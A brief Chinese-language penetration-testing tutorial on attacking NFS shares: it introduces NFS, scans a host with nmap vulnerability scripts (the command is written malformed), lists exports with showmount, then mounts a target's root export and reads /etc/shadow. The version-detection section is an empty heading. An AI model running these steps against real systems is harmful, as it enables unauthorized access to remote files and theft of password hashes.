一、介紹
NFS(Network File System)即網絡文件系統,是FreeBSD支持的文件系統中的一種,它允許網絡中的計算機之間通過TCP/IP網絡共享資源。在NFS的應用中,本地NFS的客戶端應用可以透明地讀寫位於遠端NFS服務器上的文件,就像訪問本地文件一樣。
二、探測版本
三、腳本探測是否有漏洞
nmap --script-* 192.168.1.105
四、探測nfs是否可以導出
使用showmount命令確定“/”共享(文件系統的根)是否正在導出。可能需要安裝nfs-common包才能使用“showmount”命令
apt-get install nfs-common
showmount -e IP
五、查看導出內容
mkdir nfs_dir # 創建一個目錄用來存儲下載下來的文件
mount -t nfs IP地址:/ ~/nfs_dir -o nolock # 下載目標服務器上的/目錄下的資源
cat ~/nfs_dir/etc/shadow # 查看下載下來的資源